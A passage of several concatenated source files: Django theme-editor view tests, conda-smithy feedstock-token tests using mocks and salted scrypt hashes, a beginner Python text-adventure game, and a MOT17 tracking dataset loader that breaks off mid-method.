image_style.style_property.style_property)
self.assertContains(
response,
'''<input type="radio" name="%s-image" value="%s"
id="id_%s-image_2" checked>''' % (
image_style.pk,
other_image.pk,
image_style.pk),
html=True)
def test_post_update_upload_image(self):
Image.objects.all().delete()
UserFactory(username='admin_img')
image_style = StyleValueImageFactory(
style_version=self.value.style_version,
image=set_image(folder_name='Backgrounds'))
file1 = open("tests/gbe/gbe_pagebanner.png", 'rb')
login_as(self.user, self)
response = self.client.post(self.url, data={
'%s-value_0' % self.value.pk: "rgba(255,255,255,0)",
'%s-style_property' % self.value.pk: self.value.style_property.pk,
'%s-style_property' % image_style.pk:
image_style.style_property.pk,
"%s-image" % image_style.pk: image_style.image.pk,
"%s-add_image" % image_style.pk: file1,
'update': "Update",
}, follow=True)
self.assertContains(response,
image_style.style_property.selector)
self.assertContains(response,
image_style.style_property.style_property)
self.assertContains(
response,
'''<input type="radio" name="%s-image" value="%s"
id="id_%s-image_1" checked>''' % (
image_style.pk,
image_style.image.pk + 1,
image_style.pk),
html=True)
def test_cancel(self):
login_as(self.user, self)
response = self.client.post(
self.url,
data={'cancel': "Cancel"},
follow=True)
self.assertContains(response, "The last update was canceled.")
self.assertRedirects(response,
reverse("themes_list", urlconf="gbe.themes.urls"))
def test_post_bad_data(self):
login_as(self.user, self)
response = self.client.post(self.url, data={
'finish': "Finish",
}, follow=True)
self.assertContains(response, self.title)
self.assertContains(
response,
"Something was wrong, correct the errors below and try again.")
self.assertContains(response, "This field is required.")
self.assertContains(response, self.style_url)
def test_post_bad_data_in_group(self):
self.value.style_property.label = StyleLabelFactory()
self.value.style_property.element = StyleElementFactory(
group=self.value.style_property.label.group)
self.value.style_property.save()
login_as(self.user, self)
response = self.client.post(self.url, data={
'finish': "Finish",
}, follow=True)
self.assertContains(response, self.title)
self.assertContains(
response,
"Something was wrong, correct the errors below and try again.")
self.assertContains(response, "This field is required.")
self.assertContains(response, self.style_url)
def test_get_complicated_property(self):
from gbe_forms_text import style_value_help
complex_value = StyleValueFactory(
value="5px 4px 3px rgba(10,10,10,1)",
parseable_values="5 4 3 rgba(10,10,10,1)",
style_property__style_property="text-shadow",
style_property__value_type="px px px rgba",
style_property__value_template="{}px {}px {}px {}",
style_property__selector=self.value.style_property.selector,
style_version=self.value.style_version)
login_as(self.user, self)
response = self.client.get(self.url)
self.assertContains(
response,
self.px_input % (complex_value.pk, 0, 5, complex_value.pk, 0),
html=True)
self.assertContains(
response,
self.px_input % (complex_value.pk, 1, 4, complex_value.pk, 1),
html=True)
self.assertContains(
response,
self.px_input % (complex_value.pk, 2, 3, complex_value.pk, 2),
html=True)
self.assertContains(response,
complex_value.style_property.selector)
self.assertContains(response,
complex_value.style_property.style_property)
self.assertContains(response, reverse(
"clone_theme",
urlconf="gbe.themes.urls",
args=[self.value.style_version.pk]))
self.assertContains(response, style_value_help["text-shadow-0"])
self.assertContains(response, style_value_help["text-shadow-1"])
self.assertContains(response, style_value_help["text-shadow-2"])
self.assertContains(response, style_value_help["text-shadow-3"])
def test_get_complicated_messed_up_property(self):
from gbe_forms_text import theme_help
complex_value = StyleValueFactory(
value="5px 4px rgba(10,10,10,1)",
parseable_values="5px 4px rgba(10,10,10,1)",
style_property__value_type="px px px rgba",
style_property__selector=self.value.style_property.selector,
style_version=self.value.style_version)
login_as(self.user, self)
response = self.client.get(self.url)
self.assertContains(response, "%s, VALUES: %s" % (
theme_help['mismatch'],
"[\'5px\', \'4px\', \'rgba(10,10,10,1)\']"))
def test_post_complicated_property(self):
complex_value = StyleValueFactory(
value="5px 4px 3px rgba(10,10,10,1)",
parseable_values="5 4 3 rgba(10,10,10,1)",
style_property__value_type="px px px rgba",
style_property__value_template="{}px {}px {}px {}",
style_property__selector=self.value.style_property.selector,
style_version=self.value.style_version)
login_as(self.user, self)
response = self.client.post(self.url, data={
'%s-value_0' % self.value.pk: "rgba(255,255,255,0)",
'%s-style_property' % self.value.pk: self.value.style_property.pk,
'%s-value_0' % complex_value.pk: "0",
'%s-style_property' % (
complex_value.pk): complex_value.style_property.pk,
'%s-value_1' % complex_value.pk: "10",
'%s-value_2' % complex_value.pk: "15",
'%s-value_3' % complex_value.pk: "rgba(50,50,50,0.5)",
'update': "Update",
}, follow=True)
self.assertContains(
response,
self.px_input % (complex_value.pk, 0, 0, complex_value.pk, 0),
html=True)
self.assertContains(
response,
self.px_input % (complex_value.pk, 1, 10, complex_value.pk, 1),
html=True)
self.assertContains(
response,
self.px_input % (complex_value.pk, 2, 15, complex_value.pk, 2),
html=True)
self.assertContains(response, "rgba(50,50,50,0.5)")
self.assertContains(response,
complex_value.style_property.selector)
self.assertContains(response,
complex_value.style_property.style_property)
self.assertContains(response, reverse(
"clone_theme",
urlconf="gbe.themes.urls",
args=[self.value.style_version.pk]))
def test_post_complicated_messed_up_property(self):
from gbe_forms_text import theme_help
complex_value = StyleValueFactory(
value="5px 4px 3px",
parseable_values="5 4 3",
style_property__value_type="px px px rgba",
style_property__value_template="{}px {}px {}px {}",
style_property__selector=self.value.style_property.selector,
style_version=self.value.style_version)
login_as(self.user, self)
response = self.client.post(self.url, data={
'%s-value_0' % self.value.pk: "rgba(255,255,255,0)",
'%s-style_property' % self.value.pk: self.value.style_property.pk,
'%s-value_0' % complex_value.pk: "0",
'%s-style_property' % (
complex_value.pk): complex_value.style_property.pk,
'%s-value_1' % complex_value.pk: "10",
'%s-value_2' % complex_value.pk: "15",
'%s-value_3' % complex_value.pk: "rgba(50,50,50,0.5)",
'update': "Update",
}, follow=True)
self.assertContains(response, "%s, VALUES: %s" % (
theme_help['mismatch'],
"[\'5\', \'4\', \'3\']"))
self.assertContains(
response,
"Something was wrong, correct the errors below and try again.")
def test_get_bad_value_template(self):
from gbe_forms_text import theme_help
complex_value = StyleValueFactory(
value="5px 4px 3px rgba(10,10,10,1) bad",
parseable_values="5 4 3 rgba(10,10,10,1) bad",
style_property__style_property="text-shadow",
style_property__value_type="px px px rgba bad",
style_property__value_template="{}px {}px {}px {} bad",
style_property__selector=self.value.style_property.selector,
style_version=self.value.style_version)
login_as(self.user, self)
response = self.client.get(self.url)
self.assertContains(response, "%s, VALUES: %s" % (
theme_help['bad_elem'],
"px px px rgba bad"))
# ---------------------------------------------------------------------------
# File: tests/test_feedstock_tokens.py
# Repo: h-vetinari/conda-smithy (BSD-3-Clause)
# ---------------------------------------------------------------------------
import os
import json
from unittest import mock
import pytest
import scrypt
from conda_smithy.feedstock_tokens import (
generate_and_write_feedstock_token,
read_feedstock_token,
feedstock_token_exists,
register_feedstock_token,
register_feedstock_token_with_proviers,
is_valid_feedstock_token,
)
from conda_smithy.ci_register import drone_default_endpoint
@pytest.mark.parametrize("project", ["bar", "bar-feedstock"])
@pytest.mark.parametrize(
"repo", ["GITHUB_TOKEN", "${GITHUB_TOKEN}", "GH_TOKEN", "${GH_TOKEN}"]
)
@mock.patch("conda_smithy.feedstock_tokens.tempfile")
@mock.patch("conda_smithy.feedstock_tokens.git")
@mock.patch("conda_smithy.github.gh_token")
def test_feedstock_tokens_roundtrip(
gh_mock, git_mock, tmp_mock, tmpdir, repo, project
):
gh_mock.return_value = "abc123"
tmp_mock.TemporaryDirectory.return_value.__enter__.return_value = str(
tmpdir
)
user = "foo"
pth = os.path.expanduser("~/.conda-smithy/foo_%s.token" % project)
token_json_pth = os.path.join(tmpdir, "tokens", "%s.json" % project)
os.makedirs(os.path.join(tmpdir, "tokens"), exist_ok=True)
try:
generate_and_write_feedstock_token(user, project)
assert os.path.exists(pth)
register_feedstock_token(user, project, repo)
assert os.path.exists(token_json_pth)
with open(pth, "r") as fp:
feedstock_token = fp.read().strip()
retval = is_valid_feedstock_token(user, project, feedstock_token, repo)
finally:
if os.path.exists(pth):
os.remove(pth)
assert retval
@pytest.mark.parametrize("project", ["bar", "bar-feedstock"])
@pytest.mark.parametrize(
"repo", ["GITHUB_TOKEN", "${GITHUB_TOKEN}", "GH_TOKEN", "${GH_TOKEN}"]
)
@mock.patch("conda_smithy.feedstock_tokens.tempfile")
@mock.patch("conda_smithy.feedstock_tokens.git")
@mock.patch("conda_smithy.github.gh_token")
def test_is_valid_feedstock_token_nofile(
gh_mock, git_mock, tmp_mock, tmpdir, repo, project
):
gh_mock.return_value = "abc123"
tmp_mock.TemporaryDirectory.return_value.__enter__.return_value = str(
tmpdir
)
user = "conda-forge"
feedstock_token = "akdjhfl"
retval = is_valid_feedstock_token(user, project, feedstock_token, repo)
assert not retval
@pytest.mark.parametrize("project", ["bar", "bar-feedstock"])
@pytest.mark.parametrize(
"repo", ["GITHUB_TOKEN", "${GITHUB_TOKEN}", "GH_TOKEN", "${GH_TOKEN}"]
)
@mock.patch("conda_smithy.feedstock_tokens.tempfile")
@mock.patch("conda_smithy.feedstock_tokens.git")
@mock.patch("conda_smithy.github.gh_token")
def test_is_valid_feedstock_token_badtoken(
gh_mock, git_mock, tmp_mock, tmpdir, repo, project
):
gh_mock.return_value = "abc123"
tmp_mock.TemporaryDirectory.return_value.__enter__.return_value = str(
tmpdir
)
user = "conda-forge"
feedstock_token = "akdjhfl"
token_pth = os.path.join(tmpdir, "tokens", "%s.json" % project)
os.makedirs(os.path.dirname(token_pth), exist_ok=True)
with open(token_pth, "w") as fp:
json.dump({"salt": b"adf".hex(), "hashed_token": b"fgh".hex()}, fp)
retval = is_valid_feedstock_token(user, project, feedstock_token, repo)
assert not retval
def test_generate_and_write_feedstock_token():
user = "bar"
repo = "foo"
pth = os.path.expanduser("~/.conda-smithy/bar_foo.token")
try:
generate_and_write_feedstock_token(user, repo)
assert os.path.exists(pth)
# we cannot do it twice
with pytest.raises(RuntimeError):
generate_and_write_feedstock_token(user, repo)
finally:
if os.path.exists(pth):
os.remove(pth)
def test_read_feedstock_token():
user = "bar"
repo = "foo"
pth = os.path.expanduser("~/.conda-smithy/bar_foo.token")
# no token
token, err = read_feedstock_token(user, repo)
assert "No token found in" in err
assert token is None
# empty
try:
os.system("touch " + pth)
token, err = read_feedstock_token(user, repo)
assert "Empty token found in" in err
assert token is None
finally:
if os.path.exists(pth):
os.remove(pth)
# token ok
try:
generate_and_write_feedstock_token(user, repo)
token, err = read_feedstock_token(user, repo)
assert err is None
assert token is not None
finally:
if os.path.exists(pth):
os.remove(pth)
@pytest.mark.parametrize("retval", [True, False])
@pytest.mark.parametrize("project", ["bar", "bar-feedstock"])
@pytest.mark.parametrize(
"repo", ["$GITHUB_TOKEN", "${GITHUB_TOKEN}", "$GH_TOKEN", "${GH_TOKEN}"]
)
@mock.patch("conda_smithy.feedstock_tokens.tempfile")
@mock.patch("conda_smithy.feedstock_tokens.git")
@mock.patch("conda_smithy.github.gh_token")
def test_feedstock_token_exists(
gh_mock, git_mock, tmp_mock, tmpdir, repo, project, retval
):
gh_mock.return_value = "abc123"
tmp_mock.TemporaryDirectory.return_value.__enter__.return_value = str(
tmpdir
)
user = "foo"
os.makedirs(os.path.join(tmpdir, "tokens"), exist_ok=True)
if retval:
with open(
os.path.join(tmpdir, "tokens", "%s.json" % project), "w"
) as fp:
fp.write("blarg")
assert feedstock_token_exists(user, project, repo) is retval
git_mock.Repo.clone_from.assert_called_once_with(
"abc123",
str(tmpdir),
depth=1,
)
@pytest.mark.parametrize("project", ["bar", "bar-feedstock"])
@pytest.mark.parametrize(
"repo", ["$GITHUB_TOKEN", "${GITHUB_TOKEN}", "$GH_TOKEN", "${GH_TOKEN}"]
)
@mock.patch("conda_smithy.feedstock_tokens.tempfile")
@mock.patch("conda_smithy.feedstock_tokens.git")
@mock.patch("conda_smithy.github.gh_token")
def test_feedstock_token_raises(
gh_mock, git_mock, tmp_mock, tmpdir, repo, project
):
gh_mock.return_value = "abc123"
tmp_mock.TemporaryDirectory.return_value.__enter__.return_value = str(
tmpdir
)
git_mock.Repo.clone_from.side_effect = ValueError("blarg")
user = "foo"
os.makedirs(os.path.join(tmpdir, "tokens"), exist_ok=True)
with open(os.path.join(tmpdir, "tokens", "%s.json" % project), "w") as fp:
fp.write("blarg")
with pytest.raises(RuntimeError) as e:
feedstock_token_exists(user, project, repo)
assert "Testing for the feedstock token for" in str(e.value)
git_mock.Repo.clone_from.assert_called_once_with(
"abc123",
str(tmpdir),
depth=1,
)
@pytest.mark.parametrize(
"repo", ["$GITHUB_TOKEN", "${GITHUB_TOKEN}", "$GH_TOKEN", "${GH_TOKEN}"]
)
@mock.patch("conda_smithy.feedstock_tokens.secrets")
@mock.patch("conda_smithy.feedstock_tokens.os.urandom")
@mock.patch("conda_smithy.feedstock_tokens.tempfile")
@mock.patch("conda_smithy.feedstock_tokens.git")
@mock.patch("conda_smithy.github.gh_token")
def test_register_feedstock_token_works(
gh_mock, git_mock, tmp_mock, osuran_mock, secrets_mock, tmpdir, repo
):
gh_mock.return_value = "abc123"
tmp_mock.TemporaryDirectory.return_value.__enter__.return_value = str(
tmpdir
)
secrets_mock.token_hex.return_value = "fgh"
osuran_mock.return_value = b"\x80SA"
user = "foo"
project = "bar"
os.makedirs(os.path.join(tmpdir, "tokens"), exist_ok=True)
pth = os.path.expanduser("~/.conda-smithy/foo_%s.token" % project)
token_json_pth = os.path.join(tmpdir, "tokens", "%s.json" % project)
try:
generate_and_write_feedstock_token(user, project)
register_feedstock_token(user, project, repo)
finally:
if os.path.exists(pth):
os.remove(pth)
git_mock.Repo.clone_from.assert_called_once_with(
"abc123",
str(tmpdir),
depth=1,
)
repo = git_mock.Repo.clone_from.return_value
repo.index.add.assert_called_once_with(token_json_pth)
repo.index.commit.assert_called_once_with(
"[ci skip] [skip ci] [cf admin skip] ***NO_CI*** added token for %s/%s"
% (user, project)
)
repo.remote.return_value.pull.assert_called_once_with(rebase=True)
repo.remote.return_value.push.assert_called_once_with()
salted_token = scrypt.hash("fgh", b"\x80SA", buflen=256)
data = {
"salt": b"\x80SA".hex(),
"hashed_token": salted_token.hex(),
}
with open(token_json_pth, "r") as fp:
assert json.load(fp) == data
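The test above checks that the registry stores only a salt and a salted scrypt hash, never the raw token. A minimal sketch of that verification scheme using the standard library's `hashlib.scrypt` (the `n`/`r`/`p`/`dklen` parameters here are illustrative, not necessarily what the `scrypt` package uses internally):

```python
import hashlib
import os

def hash_token(token: str, salt: bytes) -> dict:
    # Store only the salt and the salted hash, never the raw token.
    hashed = hashlib.scrypt(
        token.encode("utf-8"), salt=salt, n=2**14, r=8, p=1, dklen=256
    )
    return {"salt": salt.hex(), "hashed_token": hashed.hex()}

def check_token(token: str, record: dict) -> bool:
    # Re-derive the hash with the stored salt and compare.
    salt = bytes.fromhex(record["salt"])
    hashed = hashlib.scrypt(
        token.encode("utf-8"), salt=salt, n=2**14, r=8, p=1, dklen=256
    )
    return hashed.hex() == record["hashed_token"]

record = hash_token("fgh", os.urandom(16))
```

Because only the salted hash is committed to the tokens repo, leaking the registry does not leak usable feedstock tokens.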

@pytest.mark.parametrize(
    "repo", ["$GITHUB_TOKEN", "${GITHUB_TOKEN}", "$GH_TOKEN", "${GH_TOKEN}"]
)
@mock.patch("conda_smithy.feedstock_tokens.secrets")
@mock.patch("conda_smithy.feedstock_tokens.os.urandom")
@mock.patch("conda_smithy.feedstock_tokens.tempfile")
@mock.patch("conda_smithy.feedstock_tokens.git")
@mock.patch("conda_smithy.github.gh_token")
def test_register_feedstock_token_notoken(
    gh_mock, git_mock, tmp_mock, osuran_mock, secrets_mock, tmpdir, repo
):
    gh_mock.return_value = "abc123"
    tmp_mock.TemporaryDirectory.return_value.__enter__.return_value = str(
        tmpdir
    )
    secrets_mock.token_hex.return_value = "fgh"
    osuran_mock.return_value = b"\x80SA"

    user = "foo"
    project = "bar"

    os.makedirs(os.path.join(tmpdir, "tokens"), exist_ok=True)
    pth = os.path.expanduser("~/.conda-smithy/foo_bar.token")
    token_json_pth = os.path.join(tmpdir, "tokens", "bar.json")

    try:
        with pytest.raises(RuntimeError) as e:
            register_feedstock_token(user, project, repo)
    finally:
        if os.path.exists(pth):
            os.remove(pth)

    git_mock.Repo.clone_from.assert_not_called()

    repo = git_mock.Repo.clone_from.return_value
    repo.index.add.assert_not_called()
    repo.index.commit.assert_not_called()
    repo.remote.return_value.pull.assert_not_called()
    repo.remote.return_value.push.assert_not_called()

    assert not os.path.exists(token_json_pth)
    assert "No token found in" in str(e.value)


@pytest.mark.parametrize(
    "repo", ["$GITHUB_TOKEN", "${GITHUB_TOKEN}", "$GH_TOKEN", "${GH_TOKEN}"]
)
@mock.patch("conda_smithy.feedstock_tokens.secrets")
@mock.patch("conda_smithy.feedstock_tokens.os.urandom")
@mock.patch("conda_smithy.feedstock_tokens.tempfile")
@mock.patch("conda_smithy.feedstock_tokens.git")
@mock.patch("conda_smithy.github.gh_token")
def test_register_feedstock_token_exists_already(
    gh_mock, git_mock, tmp_mock, osuran_mock, secrets_mock, tmpdir, repo
):
    gh_mock.return_value = "abc123"
    tmp_mock.TemporaryDirectory.return_value.__enter__.return_value = str(
        tmpdir
    )
    secrets_mock.token_hex.return_value = "fgh"
    osuran_mock.return_value = b"\x80SA"

    user = "foo"
    project = "bar"

    os.makedirs(os.path.join(tmpdir, "tokens"), exist_ok=True)
    pth = os.path.expanduser("~/.conda-smithy/foo_bar.token")
    token_json_pth = os.path.join(tmpdir, "tokens", "bar.json")
    with open(token_json_pth, "w") as fp:
        fp.write("blarg")

    try:
        generate_and_write_feedstock_token(user, project)

        with pytest.raises(RuntimeError) as e:
            register_feedstock_token(user, project, repo)
    finally:
        if os.path.exists(pth):
            os.remove(pth)

    git_mock.Repo.clone_from.assert_called_once_with(
        "abc123",
        str(tmpdir),
        depth=1,
    )

    repo = git_mock.Repo.clone_from.return_value
    repo.index.add.assert_not_called()
    repo.index.commit.assert_not_called()
    repo.remote.return_value.pull.assert_not_called()
    repo.remote.return_value.push.assert_not_called()

    assert "Token for repo foo/bar already exists!" in str(e.value)


@pytest.mark.parametrize("drone", [True, False])
@pytest.mark.parametrize("circle", [True, False])
@pytest.mark.parametrize("azure", [True, False])
@pytest.mark.parametrize("travis", [True, False])
@pytest.mark.parametrize("clobber", [True, False])
@mock.patch("conda_smithy.feedstock_tokens.add_feedstock_token_to_drone")
@mock.patch("conda_smithy.feedstock_tokens.add_feedstock_token_to_circle")
@mock.patch("conda_smithy.feedstock_tokens.add_feedstock_token_to_travis")
@mock.patch("conda_smithy.feedstock_tokens.add_feedstock_token_to_azure")
def test_register_feedstock_token_with_proviers(
    azure_mock,
    travis_mock,
    circle_mock,
    drone_mock,
    drone,
    circle,
    travis,
    azure,
    clobber,
):
    user = "foo"
    project = "bar"

    pth = os.path.expanduser("~/.conda-smithy/foo_bar.token")

    try:
        generate_and_write_feedstock_token(user, project)
        feedstock_token, _ = read_feedstock_token(user, project)

        register_feedstock_token_with_proviers(
            user,
            project,
            drone=drone,
            circle=circle,
            travis=travis,
            azure=azure,
            clobber=clobber,
            drone_endpoints=[drone_default_endpoint],
        )

        if drone:
            drone_mock.assert_called_once_with(
                user,
                project,
                feedstock_token,
                clobber,
                drone_default_endpoint,
            )
        else:
            drone_mock.assert_not_called()

        if circle:
            circle_mock.assert_called_once_with(
                user, project, feedstock_token, clobber
            )
        else:
            circle_mock.assert_not_called()

        if travis:
            travis_mock.assert_called_once_with(
                user, project, feedstock_token, clobber
            )
        else:
            travis_mock.assert_not_called()

        if azure:
            azure_mock.assert_called_once_with(
                user, project, feedstock_token, clobber
            )
        else:
            azure_mock.assert_not_called()
    finally:
        if os.path.exists(pth):
            os.remove(pth)


@pytest.mark.parametrize("drone", [True, False])
@pytest.mark.parametrize("circle", [True, False])
@pytest.mark.parametrize("azure", [True, False])
@pytest.mark.parametrize("travis", [True, False])
@pytest.mark.parametrize("clobber", [True, False])
@mock.patch("conda_smithy.feedstock_tokens.add_feedstock_token_to_drone")
@mock.patch("conda_smithy.feedstock_tokens.add_feedstock_token_to_circle")
@mock.patch("conda_smithy.feedstock_tokens.add_feedstock_token_to_travis")
@mock.patch("conda_smithy.feedstock_tokens.add_feedstock_token_to_azure")
def test_register_feedstock_token_with_proviers_notoken(
    azure_mock,
    travis_mock,
    circle_mock,
    drone_mock,
    drone,
    circle,
    travis,
    azure,
    clobber,
):
    user = "foo"
    project = "bar"

    with pytest.raises(RuntimeError) as e:
        register_feedstock_token_with_proviers(
            user,
            project,
            drone=drone,
            circle=circle,
            travis=travis,
            azure=azure,
            clobber=clobber,
        )

    assert "No token" in str(e.value)

    drone_mock.assert_not_called()
    circle_mock.assert_not_called()
    travis_mock.assert_not_called()
    azure_mock.assert_not_called()


@pytest.mark.parametrize("provider", ["drone", "circle", "travis", "azure"])
@mock.patch("conda_smithy.feedstock_tokens.add_feedstock_token_to_drone")
@mock.patch("conda_smithy.feedstock_tokens.add_feedstock_token_to_circle")
@mock.patch("conda_smithy.feedstock_tokens.add_feedstock_token_to_travis")
@mock.patch("conda_smithy.feedstock_tokens.add_feedstock_token_to_azure")
def test_register_feedstock_token_with_proviers_error(
    azure_mock,
    travis_mock,
    circle_mock,
    drone_mock,
    provider,
):
    user = "foo"
    project = "bar-feedstock"

    pth = os.path.expanduser("~/.conda-smithy/foo_bar-feedstock.token")

    if provider == "drone":
        drone_mock.side_effect = ValueError("blah")
    if provider == "circle":
        circle_mock.side_effect = ValueError("blah")
    if provider == "travis":
        travis_mock.side_effect = ValueError("blah")
    if provider == "azure":
        azure_mock.side_effect = ValueError("blah")

    try:
        generate_and_write_feedstock_token(user, project)
        feedstock_token, _ = read_feedstock_token(user, project)

        with pytest.raises(RuntimeError) as e:
            register_feedstock_token_with_proviers(
                user, project, drone_endpoints=[drone_default_endpoint]
            )

        assert "on %s" % provider in str(e.value)
    finally:
        if os.path.exists(pth):
            os.remove(pth)
# treasure-island.py (from the-cryptozoologist/python-bootcamp, MIT license)
print('''
*******************************************************************************
          |                   |                  |                     |
 _________|________________.=""_;=.______________|_____________________|_______
|                   |  ,-"_,=""     `"=.|                  |
|___________________|__"=._o`"-._        `"=.______________|___________________
          |                `"=._o`"=._      _`"=._                     |
 _________|_____________________:=._o "=._."_.-="'"=.__________________|_______
|                   |    __.--" , ; `"=._o." ,-"""-._ ".   |
|___________________|_._"  ,. .`  ` `` ,  `"-._"-._   ". '__|__________________
          |           |o`"=._` , "` `; .". ,  "-._"-._; ;              |
 _________|___________| ;`-.o`"=._; ." ` '`."\` . "-._ /_______________|_______
|                   | |o;    `"-.o`"=._``  '` " ,__.--o;   |
|___________________|_| ;     (#) `-.o `"=.`_.--"_o.-; ;___|___________________
____/______/______/___|o;._    "      `".o|o_.--"    ;o;____/______/______/____
/______/______/______/_"=._o--._        ; | ;        ; ;/______/______/______/_
____/______/______/______/__"=._o--._   ;o|o;     _._;o;____/______/______/____
/______/______/______/______/____"=._o._; | ;_.--"o.--"_/______/______/______/_
____/______/______/______/______/_____"=.o|o_.--""___/______/______/______/____
/______/______/______/______/______/______/______/______/______/______/______/_
*******************************************************************************
''')

def game():
    print("Welcome to Treasure Island.")
    print("Your mission is to find the treasure.")
    print('You\'re at a crossroad. Where do you want to go?\n')
    cross = input()
    if cross == 'right':
        print("You fell down a rabbit hole! Game Over.")
        return
    elif cross == 'left':
        swim_or_wait = input('You\'ve come to a lake. There is an island in the middle of the lake. Type "wait" to wait for a boat. Type "swim" to swim across.\n')
        while True:
            if swim_or_wait == 'swim':
                print("You got attacked by a shrimp! Game Over.")
                return
            elif swim_or_wait == 'wait':
                door = input("You arrive at the island unharmed. There is a house with 3 doors. One red, one yellow and one blue. Which color do you choose?\n")
                while True:
                    if door == 'blue':
                        print('You enter a room of murderous kittens. Game Over.')
                        return
                    elif door == 'red':
                        print('The room is on fire! This is not fine, Game Over.')
                        return
                    elif door == 'yellow':
                        print('You found the treasure! You Win.')
                    else:
                        door = input('You chose a door that doesn\'t exist. Try again.')
                        while True:
                            if door == 'blue':
                                print('You enter a room of murderous kittens. Game Over.')
                                return
                            elif door == 'red':
                                print('The room is on fire! This is not fine, Game Over.')
                                return
                            elif door == 'yellow':
                                print('You found the treasure! You Win.')
                                return
            else:
                swim_or_wait = input('Sorry none can do. Do you want to "swim" or "wait"?\n')
                while True:
                    if swim_or_wait == 'swim':
                        print("You got attacked by a shrimp! Game Over.")
                        return
                    elif swim_or_wait == 'wait':
                        door = input("You arrive at the island unharmed. There is a house with 3 doors. One red, one yellow and one blue. Which color do you choose?\n")
                        while True:
                            if door == 'blue':
                                print('You enter a room of murderous kittens. Game Over.')
                                return
                            elif door == 'red':
                                print('The room is on fire! This is not fine, Game Over.')
                                return
                            elif door == 'yellow':
                                print('You found the treasure! You Win.')
                            else:
                                door = input('You chose a door that doesn\'t exist. Try again.')
                                while True:
                                    if door == 'blue':
                                        print('You enter a room of murderous kittens. Game Over.')
                                        return
                                    elif door == 'red':
                                        print('The room is on fire! This is not fine, Game Over.')
                                        return
                                    elif door == 'yellow':
                                        print('You found the treasure! You Win.')
                                        return
    else:
        cross = input('There is no turning back. Do you want to go right or left?\n')
        if cross == 'right':
            print("You fell down a rabbit hole! Game Over.")
            return
        elif cross == 'left':
            swim_or_wait = input('You\'ve come to a lake. There is an island in the middle of the lake. Type "wait" to wait for a boat. Type "swim" to swim across.\n')
            while True:
                if swim_or_wait == 'swim':
                    print("You got attacked by a shrimp! Game Over.")
                    return
                elif swim_or_wait == 'wait':
                    door = input("You arrive at the island unharmed. There is a house with 3 doors. One red, one yellow and one blue. Which color do you choose?\n")
                    while True:
                        if door == 'blue':
                            print('You enter a room of murderous kittens. Game Over.')
                            return
                        elif door == 'red':
                            print('The room is on fire! This is not fine, Game Over.')
                            return
                        elif door == 'yellow':
                            print('You found the treasure! You Win.')
                        else:
                            door = input('You chose a door that doesn\'t exist. Try again.')
                            while True:
                                if door == 'blue':
                                    print('You enter a room of murderous kittens. Game Over.')
                                    return
                                elif door == 'red':
                                    print('The room is on fire! This is not fine, Game Over.')
                                    return
                                elif door == 'yellow':
                                    print('You found the treasure! You Win.')
                                    return
                else:
                    swim_or_wait = input('Sorry none can do. Do you want to "swim" or "wait"?\n')
                    while True:
                        if swim_or_wait == 'swim':
                            print("You got attacked by a shrimp! Game Over.")
                            return
                        elif swim_or_wait == 'wait':
                            door = input("You arrive at the island unharmed. There is a house with 3 doors. One red, one yellow and one blue. Which color do you choose?\n")
                            while True:
                                if door == 'blue':
                                    print('You enter a room of murderous kittens. Game Over.')
                                    return
                                elif door == 'red':
                                    print('The room is on fire! This is not fine, Game Over.')
                                    return
                                elif door == 'yellow':
                                    print('You found the treasure! You Win.')
                                else:
                                    door = input('You chose a door that doesn\'t exist. Try again.')
                                    while True:
                                        if door == 'blue':
                                            print('You enter a room of murderous kittens. Game Over.')
                                            return
                                        elif door == 'red':
                                            print('The room is on fire! This is not fine, Game Over.')
                                            return
                                        elif door == 'yellow':
                                            print('You found the treasure! You Win.')
                                            return


while input('Do you want to play a game? [y/n]\n') == 'y':
    game()
    break
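The same three-way door check appears eight times above. As a refactoring sketch (the helper name and dict are hypothetical, not from the original), the repeated if/elif blocks could collapse into one lookup:

```python
def door_outcome(color):
    # Maps a door color to the message the repeated if/elif blocks print.
    outcomes = {
        'blue': 'You enter a room of murderous kittens. Game Over.',
        'red': 'The room is on fire! This is not fine, Game Over.',
        'yellow': 'You found the treasure! You Win.',
    }
    return outcomes.get(color, "You chose a door that doesn't exist. Try again.")
```

Each nested branch would then reduce to printing `door_outcome(door)` and deciding whether to re-prompt.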
# mot17.py (dataset/mot17.py from BoPang1996/TubeTK, MIT license)
import torch.utils.data as data
import random

from PIL import ImageFile

from dataset.augmentation import SSJAugmentation
from dataset.Parsers.MOT17 import GTParser_MOT_17

ImageFile.LOAD_TRUNCATED_IMAGES = True


class MOT17TrainDataset(data.Dataset):
    '''
    Training dataset: reads the gt.txt file and rearranges it into a set of
    tracks. Samples can be selected starting from a specified frame.
    '''
    def __init__(self,
                 mot_root,
                 epoch,
                 arg,
                 transform=SSJAugmentation,
                 ):
        # 1. init all the variables
        self.mot_root = mot_root
        self.transform = transform(size=arg.img_size, type='train')
        self.epoch = epoch

        # 2. init GTParser
        self.parser = GTParser_MOT_17(
            self.mot_root, 'train', forward_frames=arg.forward_frames,
            frame_stride=arg.frame_stride, min_vis=arg.min_visibility,
            value_range=arg.value_range)

    def __getitem__(self, item):
        item = item % len(self.parser)
        image, img_meta, tubes, labels, start_frame = self.parser[item]
        while image is None:
            item = item + 50
            image, img_meta, tubes, labels, start_frame = self.parser[
                item % len(self.parser)]
            print('None processing.')

        if self.transform is None:
            return image, img_meta, tubes, labels, start_frame
        else:
            image, img_meta, tubes, labels, start_frame = self.transform(
                image, img_meta, tubes, labels, start_frame)
            return image, img_meta, tubes, labels, start_frame

    def __len__(self):
        return len(self.parser) * self.epoch


class MOT17TestDataset(data.Dataset):
    '''
    Test dataset: reads the gt.txt file and rearranges it into a set of
    tracks. Samples can be selected starting from a specified frame.
    '''
    def __init__(self,
                 mot_root,
                 epoch,
                 type,
                 test_seq,
                 arg,
                 transform=SSJAugmentation,
                 ):
        # 1. init all the variables
        self.mot_root = mot_root
        self.transform = transform(size=arg.img_size, type='test')
        self.epoch = epoch

        # 2. init GTParser
        self.parser = GTParser_MOT_17(
            self.mot_root, type, test_seq=test_seq,
            forward_frames=arg.forward_frames,
            frame_stride=arg.frame_stride, min_vis=arg.min_visibility,
            value_range=arg.value_range)

    def __getitem__(self, item):
        item = item % len(self.parser)
        image, img_meta, tubes, labels, start_frame = self.parser[item]
        while image is None:
            image, img_meta, tubes, labels, start_frame = self.parser[
                (item + random.randint(-10, 10)) % len(self.parser)]
            print('None processing.')

        if self.transform is None:
            return image, img_meta, tubes, labels, start_frame
        else:
            image, img_meta, tubes, labels, start_frame = self.transform(
                image, img_meta, tubes, labels, start_frame)
            return image, img_meta, tubes, labels, start_frame

    def __len__(self):
